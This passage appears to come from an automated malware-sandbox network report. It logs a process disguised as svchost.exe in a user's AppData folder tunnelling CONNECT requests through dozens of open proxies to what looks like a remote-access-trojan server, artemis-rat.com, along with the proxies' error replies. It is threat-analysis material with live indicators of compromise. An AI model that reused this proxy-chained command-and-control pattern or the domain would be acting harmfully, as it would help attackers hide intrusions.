73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3369192.168.2.560888172.67.182.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.769047022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.923554897 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3370192.168.2.560192138.2.73.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.769695997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3371192.168.2.560900104.27.83.1838043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.770972013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.925508022 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3372192.168.2.560901104.21.64.2088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.771466970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.925904989 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3373192.168.2.56022646.229.253.67312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.771944046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.880295038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3374192.168.2.560686220.247.161.235108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.772098064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3375192.168.2.560802203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.772387028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3376192.168.2.560224218.255.187.608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.772886992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.880294085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3377192.168.2.560769139.224.64.191808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.773210049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.118145943 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3378192.168.2.55954075.119.145.1542508443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.773308992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3379192.168.2.560806125.141.139.55556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.773556948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.474126101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366430044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3380192.168.2.560278188.132.222.194808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.776791096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3381192.168.2.556393181.78.19.24899943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.777457952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849190950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3382192.168.2.56080588.79.243.103312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.780817986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.101351023 CET1254INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.28
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 952
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ah_test
                                                                                    Via: 1.1 ah_test (squid/3.5.28)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 35 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:35 GMT</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3383192.168.2.56083747.243.92.199312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.781359911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.091231108 CET38INHTTP/1.1 200 OK
                                                                                    content-length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3384192.168.2.56084951.89.173.402043543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.781626940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.474270105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474606037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3385192.168.2.555962154.70.214.105414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.782126904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3386192.168.2.560825123.57.246.163811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.782485008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.232656956 CET132INHTTP/1.1 503 Too many open connections
                                                                                    Content-Type: text/plain
                                                                                    Connection: close
                                                                                    Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                    Data Ascii: Maximum number of open connections reached.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3387192.168.2.56088438.162.3.74312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
